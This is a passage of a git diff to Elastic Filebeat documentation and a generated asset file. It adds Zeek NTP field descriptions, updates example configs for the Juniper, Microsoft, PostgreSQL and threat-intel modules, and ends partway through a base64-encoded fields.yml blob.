@@ -159340,6 +160082,143 @@ type: keyword -- +[float] +=== ntp + +Fields exported by the Zeek NTP log. + + + +*`zeek.ntp.version`*:: ++ +-- +The NTP version number (1, 2, 3, 4). + + +type: integer + +-- + +*`zeek.ntp.mode`*:: ++ +-- +The NTP mode being used. + + +type: integer + +-- + +*`zeek.ntp.stratum`*:: ++ +-- +The stratum (primary server, secondary server, etc.). + + +type: integer + +-- + +*`zeek.ntp.poll`*:: ++ +-- +The maximum interval between successive messages in seconds. + + +type: double + +-- + +*`zeek.ntp.precision`*:: ++ +-- +The precision of the system clock in seconds. + + +type: double + +-- + +*`zeek.ntp.root_delay`*:: ++ +-- +Total round-trip delay to the reference clock in seconds. + + +type: double + +-- + +*`zeek.ntp.root_disp`*:: ++ +-- +Total dispersion to the reference clock in seconds. + + +type: double + +-- + +*`zeek.ntp.ref_id`*:: ++ +-- +For stratum 0, 4 character string used for debugging. For stratum 1, ID assigned to the reference clock by IANA. Above stratum 1, when using IPv4, the IP address of the reference clock. Note that the NTP protocol did not originally specify a large enough field to represent IPv6 addresses, so they use the first four bytes of the MD5 hash of the reference clock’s IPv6 address (i.e. an IPv4 address here is not necessarily IPv4). + + +type: keyword + +-- + +*`zeek.ntp.ref_time`*:: ++ +-- +Time when the system clock was last set or correct. + + +type: date + +-- + +*`zeek.ntp.org_time`*:: ++ +-- +Time at the client when the request departed for the NTP server. + + +type: date + +-- + +*`zeek.ntp.rec_time`*:: ++ +-- +Time at the server when the request arrived from the NTP client. + + +type: date + +-- + +*`zeek.ntp.xmt_time`*:: ++ +-- +Time at the server when the response departed for the NTP client. + + +type: date + +-- + +*`zeek.ntp.num_exts`*:: ++ +-- +Number of extension fields (which are not currently parsed). + + +type: integer + +-- + [float] === ocsp 
diff --git a/filebeat/docs/index.asciidoc b/filebeat/docs/index.asciidoc index 69633f6836d..5193aef8667 100644 --- a/filebeat/docs/index.asciidoc +++ b/filebeat/docs/index.asciidoc @@ -22,6 +22,7 @@ include::{asciidoc-dir}/../../shared/attributes.asciidoc[] :has_docker_label_ex: :has_modules_command: :has_kubernetes_logs_path_matcher: +:has_nomad_logs_path_matcher: :has_registry: :deb_os: :rpm_os: diff --git a/filebeat/docs/modules/juniper.asciidoc b/filebeat/docs/modules/juniper.asciidoc index a2d2a0100d3..8b7b8d50ae1 100644 --- a/filebeat/docs/modules/juniper.asciidoc +++ b/filebeat/docs/modules/juniper.asciidoc @@ -73,7 +73,7 @@ Versions above this are expected to work but have not been tested. [source,yaml] ---- -- module: sophosxg +- module: junos firewall: enabled: true var.input: udp diff --git a/filebeat/docs/modules/microsoft.asciidoc b/filebeat/docs/modules/microsoft.asciidoc index f446d8a5bb6..f82d99f3c27 100644 --- a/filebeat/docs/modules/microsoft.asciidoc +++ b/filebeat/docs/modules/microsoft.asciidoc @@ -54,7 +54,9 @@ Example config: enabled: true var.oauth2.client.id: "123abc-879546asd-349587-ad64508" var.oauth2.client.secret: "980453~-Sg99gedf" - var.oauth2.token_url: "https://login.microsoftonline.com/INSERT-TENANT-ID/oauth2/token" + var.oauth2.token_url: "https://login.microsoftonline.com/INSERT-TENANT-ID/oauth2/v2.0/token" + var.oauth2.scopes: + - "https://api.security.microsoft.com/.default" ---- *`var.oauth2.client.id`*:: @@ -69,6 +71,10 @@ The secret related to the client ID. A predefined URL towards the Oauth2 service for Microsoft. The URL should always be the same with the exception of the Tenant ID that needs to be added to the full URL. +*`var.oauth2.scopes`*:: + +A list of included scopes, should use .default unless different is specified. + [float] ==== 365 Defender ECS fields diff --git a/filebeat/docs/modules/postgresql.asciidoc b/filebeat/docs/modules/postgresql.asciidoc index 695a30dffdd..7483be9ac21 100644 
--- a/filebeat/docs/modules/postgresql.asciidoc +++ b/filebeat/docs/modules/postgresql.asciidoc 
@@ -26,6 +26,80 @@ The +{modulename}+ module using `.log` was tested with logs from versions 9.5 on The +{modulename}+ module using `.csv` was tested using versions 11 and 13 (distro is not relevant here). +[float] +=== Supported log formats + +This module can collect any logs from PostgreSQL servers, but to be able to +better analyze their contents and extract more information, they should be +formatted in a determined way. + +There are some settings to take into account for the log format. + +Log lines should be preffixed with the timestamp in milliseconds, the process +id, the user id and the database name. This uses to be the default in most +distributions, and is translated to this setting in the configuration file: + +["source","sh"] +---------------------------- +log_line_prefix = '%m [%p] %q%u@%d ' +---------------------------- + +PostgreSQL server can be configured to log statements and their durations and +this module is able to collect this information. To be able to correlate each +duration with their statements, they must be logged in the same line. This +happens when the following options are used: + +["source","sh"] +---------------------------- +log_duration = 'on' +log_statement = 'none' +log_min_duration_statement = 0 +---------------------------- + +Setting a zero value in `log_min_duration_statement` will log all statements +executed by a client. You probably want to configure it to a higher value, so it +logs only slower statements. This value is configured in milliseconds. + +When using `log_statement` and `log_duration` together, statements and durations +are logged in different lines, and {beatname_uc} is not able to correlate both +values, for this reason it is recommended to disable `log_statement`. + +NOTE: The PostgreSQL module of Metricbeat is also able to collect information +about all statements executed in the server. You may chose which one is better +for your needings. 
An important difference is that the Metricbeat module +collects aggregated information when the statement is executed several times, +but cannot know when each statement was executed. This information can be +obtained from logs. + +Other logging options that you may consider to enable are the following ones: + +["source","sh"] +---------------------------- +log_checkpoints = 'on'; +log_connections = 'on'; +log_disconnections = 'on'; +log_lock_waits = 'on'; +---------------------------- + +Both `log_connections` and `log_disconnections` can cause a lot of events if you +don't have persistent connections, so enable with care. + +[float] +=== Using CSV logs + +Since the PostgreSQL CSV log file is a well-defined format, +there is almost no configuration to be done in {beatname_uc}, just the filepath. + +On the other hand, it's necessary to configure postgresql to emit `.csv` logs. +The recommended parameters are: + +["source","sh"] +---------------------------- +logging_collector = 'on'; +log_destination = 'csvlog'; +---------------------------- + + include::../include/configuring-intro.asciidoc[] The following example shows how to set paths in the +modules.d/{modulename}.yml+ 
@@ -69,38 +143,14 @@ The first dashboard is for regular logs. [role="screenshot"] image::./images/filebeat-postgresql-overview.png[] -The second one shows the slowlogs of PostgreSQL. +The second one shows the slowlogs of PostgreSQL. If `log_min_duration_statement` +is not used, this dashboard will show incomplete or no data. [role="screenshot"] image::./images/filebeat-postgresql-slowlog-overview.png[] :has-dashboards!: -=== Using CSV logs - -Since the PostgreSQL CSV log file is a well-defined format, -there is almost no configuration to be done in filebeat, just the filepath - -On the other hand, it's necessary to configure postgresql to emit `.csv` logs. -The recommended parameters are: - -``` -logging_collector = 'on'; -log_destination = 'csvlog'; -log_statement = 'none'; -log_checkpoints = on; -log_connections = on; -log_disconnections = on; -log_lock_waits = on; -log_min_duration_statement = 0; -``` - -In busy servers, `log_min_duration_statement` can cause contention, so you can assign -a value greater than 0. - -Both `log_connections` and `log_disconnections` can cause a lot of events if you don't have -persistent connections, so enable with care. - :fileset_ex!: :modulename!: diff --git a/filebeat/docs/modules/threatintel.asciidoc b/filebeat/docs/modules/threatintel.asciidoc index 588ff726e02..fa98046f2d5 100644 --- a/filebeat/docs/modules/threatintel.asciidoc +++ b/filebeat/docs/modules/threatintel.asciidoc @@ -125,7 +125,7 @@ should look initially, and optionally any filters used to filter the results. var.input: httpjson var.url: https://SERVER/events/restSearch var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z - var.initial_interval: 24h + var.first_interval: 24h var.interval: 60m ---- @@ -147,7 +147,7 @@ reference the MISP fields located on the MISP server itself. var.filters: - type: ["md5", "sha256", "url", "ip-src"] - threat_level: 4 - var.initial_interval: 24h + var.first_interval: 24h var.interval: 60m ---- 
diff --git a/filebeat/include/fields.go b/filebeat/include/fields.go index 0048fd9507c..169c268b2c9 100644 --- a/filebeat/include/fields.go +++ b/filebeat/include/fields.go 
@@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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" + return "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